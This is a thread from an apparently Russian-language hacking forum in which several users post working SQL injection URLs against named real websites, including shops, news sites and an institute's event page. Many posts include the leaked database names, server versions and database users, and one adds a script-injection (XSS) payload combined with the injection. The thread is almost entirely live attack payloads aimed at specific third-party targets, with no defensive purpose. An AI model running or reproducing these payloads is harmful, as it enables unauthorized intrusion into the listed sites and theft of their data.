SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    29
    Likes Received:
    18
    Reputations:
    7
    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|ininterne1_stan@192.168.1.41

    какой то испанский шоп
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
  2. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    29
    Likes Received:
    18
    Reputations:
    7
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
    
    db_eircicai|5.5.51|koresoft@localhost

    и XSS тут же
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
    
     
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,001
    Likes Received:
    1,344
    Reputations:
    43
    Это называется SiXSS
     
    ms13 likes this.
  4. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    47
    Likes Received:
    11
    Reputations:
    11
    Code:
    http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
     
    BabaDook likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,461
    Likes Received:
    398
    Reputations:
    228
    Code:
    http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
     
    BabaDook likes this.
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
     
    BenderMR likes this.
  7. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    46
    Likes Received:
    5
    Reputations:
    0
    Code:
    https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
     
    BenderMR likes this.
  8. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    29
    Likes Received:
    18
    Reputations:
    7
    MegaKeys.RU
    Code:
    https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
     
    RedHazard likes this.
  9. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    47
    Likes Received:
    11
    Reputations:
    11
    Code:
    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
     
    BenderMR likes this.
  10. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    29
    Likes Received:
    18
    Reputations:
    7
    BChainHacks
    Code:
    https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
    bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
     
Loading...